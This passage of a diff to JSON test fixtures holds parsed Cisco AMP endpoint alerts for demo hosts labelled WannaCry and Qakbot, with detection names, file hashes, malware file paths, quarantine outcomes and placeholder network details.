"Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 93256, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064604", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 94442, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064603", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 95628, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "related.hosts": [ - "Demo_Qakbot_3" + "Demo_WannaCry_Ransomware" ], "related.ip": [ "8.8.8.8", @@ -2068,49 +4510,49 @@ ] }, { - "@timestamp": "2021-01-14T19:10:30.000Z", + "@timestamp": "2021-01-14T17:39:51.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "02:2f:e0:10:03:5d" + "mac": "53:74:31:cb:37:50" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6412662850426241033", - "cisco.amp.error.description": "Object name not found", - "cisco.amp.error.error_code": 3221225524, - "cisco.amp.event_type_id": 2164260893, + "cisco.amp.detection_id": "6419275394960064602", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "02:2f:e0:10:03:5d" + "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 218000000, - "event.action": "Retrospective Quarantine Attempt Failed", + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", "event.category": [ "malware" ], "event.dataset": "cisco.amp", - "event.id": 6412662850426241000, + "event.id": 6419275399255032000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 3, - "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", "fileset.name": "amp", - "host.hostname": "Demo_Qakbot_3", - "host.name": "Demo_Qakbot_3", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 69533, + "log.offset": 96814, "related.hash": [ - "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "related.hosts": [ - "Demo_Qakbot_3" + "Demo_WannaCry_Ransomware" ], "related.ip": [ "8.8.8.8", @@ -2123,7 +4565,7 @@ ] }, { - "@timestamp": "2021-01-14T18:03:55.000Z", + "@timestamp": "2021-01-14T17:39:51.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -2134,9 +4576,9 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419281601187807332", - "cisco.amp.error.description": "Object name not found", - "cisco.amp.error.error_code": 3221225524, + "cisco.amp.detection_id": "6419275394960064601", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, "cisco.amp.event_type_id": 2164260880, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ @@ -2145,24 +4587,24 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 891000000, + "cisco.amp.timestamp_nanoseconds": 281000000, "event.action": "Quarantine Failure", "event.category": [ "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419281601187807000, + "event.id": 6419275399255032000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 74502, + "log.offset": 98000, "related.hash": [ - "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -2178,7 +4620,7 @@ ] }, { - "@timestamp": "2021-01-14T18:03:52.000Z", + "@timestamp": "2021-01-14T17:39:51.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -2189,50 +4631,35 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6419281588302905443", - "cisco.amp.event_type_id": 1090519054, + "cisco.amp.detection_id": "6419275394960064598", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Clean", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 396000000, - "event.action": "Threat Detected", + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", "event.category": [ - "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419281588302905000, + "event.id": 6419275399255032000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", - "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", - "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", - "file.name": "mssecsvc.exe", - "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 77209, - "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", - "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", - "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", - "process.name": "lsass.exe", - "process.pid": 708, + "log.offset": 99186, "related.hash": [ - "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", - "db349b97c37d22f5ea1d1841e3c89eb4", - "e889544aff85ffaf8b0d0da705105dee7c97fe26" + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -2241,9 +4668,6 @@ "8.8.8.8", "10.10.10.10" ], - "related.user": [ - "user@testdomain.com" - ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -2251,49 +4675,49 @@ ] }, { - "@timestamp": "2021-01-14T17:51:19.000Z", + "@timestamp": "2021-01-14T17:39:51.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "f9:65:da:22:2a:41" + "mac": "53:74:31:cb:37:50" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6411538569722068995", - "cisco.amp.error.description": "Object name not found", - "cisco.amp.error.error_code": 3221225524, - "cisco.amp.event_type_id": 2164260893, + "cisco.amp.detection_id": "6419275394960064600", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "f9:65:da:22:2a:41" + "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 495000000, - "event.action": "Retrospective Quarantine Attempt Failed", + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", "event.category": [ "malware" ], "event.dataset": "cisco.amp", - "event.id": 6411538569722069000, + "event.id": 6419275399255032000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 3, - "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", "fileset.name": "amp", - "host.hostname": "Demo_Qakbot_1", - "host.name": "Demo_Qakbot_1", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 79928, + "log.offset": 100372, "related.hash": [ - "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "related.hosts": [ - "Demo_Qakbot_1" + "Demo_WannaCry_Ransomware" ], "related.ip": [ "8.8.8.8", @@ -2306,54 +4730,68 @@ ] }, { - "@timestamp": "2021-01-14T17:51:19.000Z", + "@timestamp": "2021-01-14T17:39:51.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "f9:65:da:22:2a:41" + "mac": "53:74:31:cb:37:50" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6411538569722068994", - "cisco.amp.error.description": "Object name not found", - "cisco.amp.error.error_code": 3221225524, - "cisco.amp.event_type_id": 2164260893, + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275399255031906", + "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "f9:65:da:22:2a:41" + "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 495000000, - "event.action": "Retrospective Quarantine Attempt Failed", + "cisco.amp.timestamp_nanoseconds": 812000000, + "event.action": "Threat Detected", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6411538569722069000, + "event.id": 6419275399255032000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 3, - "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", "fileset.name": "amp", - "host.hostname": "Demo_Qakbot_1", - "host.name": "Demo_Qakbot_1", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 81129, + "log.offset": 101558, + "process.hash.md5": "ad7b9c14083b52bc532fba5948342b98", + "process.hash.sha1": "ee8cbf12d87c4d388f09b4f69bed2e91682920b5", + "process.hash.sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae", + "process.name": "cmd.exe", + "process.pid": 3200, "related.hash": [ - "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "related.hosts": [ - "Demo_Qakbot_1" + "Demo_WannaCry_Ransomware" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -2361,52 +4799,70 @@ ] }, { - "@timestamp": "2021-01-14T17:51:19.000Z", + "@timestamp": "2021-01-14T17:39:51.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "f9:65:da:22:2a:41" + "mac": "53:74:31:cb:37:50" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6411538569722068993", - "cisco.amp.event_type_id": 553648155, + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275399255031905", + "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "f9:65:da:22:2a:41" + "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 495000000, - "event.action": "Retrospective Quarantine", + "cisco.amp.timestamp_nanoseconds": 235000000, + "event.action": "Threat Detected", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6411538569722069000, + "event.id": 6419275399255032000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 3, - "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", "fileset.name": "amp", - "host.hostname": "Demo_Qakbot_1", - "host.name": "Demo_Qakbot_1", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 82330, + "log.offset": 103091, + "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "process.name": "tasksche.exe", + "process.pid": 2708, "related.hash": [ - "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "related.hosts": [ - "Demo_Qakbot_1" + "Demo_WannaCry_Ransomware" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -2425,10 +4881,9 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419275399255031906", - "cisco.amp.error.description": "Object name not found", - "cisco.amp.error.error_code": 3221225524, - "cisco.amp.event_type_id": 2164260880, + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275399255031904", + "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" @@ -2436,9 +4891,10 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 812000000, - "event.action": "Quarantine Failure", + "cisco.amp.timestamp_nanoseconds": 172000000, + "event.action": "Threat Detected", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", @@ -2447,11 +4903,16 @@ "event.module": "cisco", "event.severity": 2, "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\Windows\\tasksche.exe", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 87312, + "log.offset": 104633, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -2462,6 +4923,9 @@ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -2480,10 +4944,8 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419275399255031905", - "cisco.amp.error.description": "Delete pending", - "cisco.amp.error.error_code": 3221225558, - "cisco.amp.event_type_id": 2164260880, + "cisco.amp.detection_id": "6419275394960064599", + "cisco.amp.event_type_id": 553648143, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" @@ -2491,8 +4953,8 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 297000000, - "event.action": "Quarantine Failure", + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Threat Quarantined", "event.category": [ "malware" ], @@ -2506,7 +4968,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 88505, + "log.offset": 105894, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -2524,7 +4986,7 @@ ] }, { - "@timestamp": "2021-01-14T17:39:51.000Z", + "@timestamp": "2021-01-14T17:39:50.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -2535,9 +4997,9 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419275399255031904", - "cisco.amp.error.description": "Object name not found", - "cisco.amp.error.error_code": 3221225524, + "cisco.amp.detection_id": "6419275394960064597", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, "cisco.amp.event_type_id": 2164260880, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ @@ -2546,13 +5008,13 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 297000000, + "cisco.amp.timestamp_nanoseconds": 423000000, "event.action": "Quarantine Failure", "event.category": [ "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419275399255032000, + "event.id": 6419275394960065000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, @@ -2561,7 +5023,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 89691, + "log.offset": 107014, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -2579,7 +5041,7 @@ ] }, { - "@timestamp": "2021-01-14T17:39:51.000Z", + "@timestamp": "2021-01-14T17:39:50.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -2590,7 +5052,7 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419275394960064606", + "cisco.amp.detection_id": "6419275394960064596", "cisco.amp.error.description": "Delete pending", "cisco.amp.error.error_code": 3221225558, "cisco.amp.event_type_id": 2164260880, @@ -2601,24 +5063,24 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 297000000, + "cisco.amp.timestamp_nanoseconds": 377000000, "event.action": "Quarantine Failure", "event.category": [ "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419275399255032000, + "event.id": 6419275394960065000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 90884, + "log.offset": 108200, "related.hash": [ - "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -2634,7 +5096,7 @@ ] }, { - "@timestamp": "2021-01-14T17:39:51.000Z", + "@timestamp": "2021-01-14T17:39:50.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -2645,7 +5107,7 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419275394960064605", + "cisco.amp.detection_id": "6419275394960064594", "cisco.amp.error.description": "Delete pending", "cisco.amp.error.error_code": 3221225558, "cisco.amp.event_type_id": 2164260880, @@ -2656,24 +5118,24 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 281000000, + "cisco.amp.timestamp_nanoseconds": 33000000, "event.action": "Quarantine Failure", "event.category": [ "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419275399255032000, + "event.id": 6419275394960065000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 92070, + "log.offset": 109386, "related.hash": [ - "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -2689,7 +5151,7 @@ ] }, { - "@timestamp": "2021-01-14T17:39:51.000Z", + "@timestamp": "2021-01-14T17:39:50.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -2700,10 +5162,9 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419275394960064607", - "cisco.amp.error.description": "Delete pending", - "cisco.amp.error.error_code": 3221225558, - "cisco.amp.event_type_id": 2164260880, + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064606", + "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" @@ -2711,24 +5172,34 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 281000000, - "event.action": "Quarantine Failure", + "cisco.amp.timestamp_nanoseconds": 907000000, + "event.action": "Threat Detected", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419275399255032000, + "event.id": 6419275394960065000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 93256, + "log.offset": 110571, "related.hash": [ - "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -2737,6 +5208,9 @@ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -2744,7 +5218,7 @@ ] }, { - "@timestamp": "2021-01-14T17:39:51.000Z", + "@timestamp": "2021-01-14T17:39:50.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -2755,10 +5229,9 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419275394960064604", - "cisco.amp.error.description": "Delete pending", - "cisco.amp.error.error_code": 3221225558, - "cisco.amp.event_type_id": 2164260880, + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064605", + "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" @@ -2766,24 +5239,34 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 281000000, - "event.action": "Quarantine Failure", + "cisco.amp.timestamp_nanoseconds": 907000000, + "event.action": "Threat Detected", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419275399255032000, + "event.id": 6419275394960065000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 94442, + "log.offset": 111942, "related.hash": [ - "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "related.hosts": [ 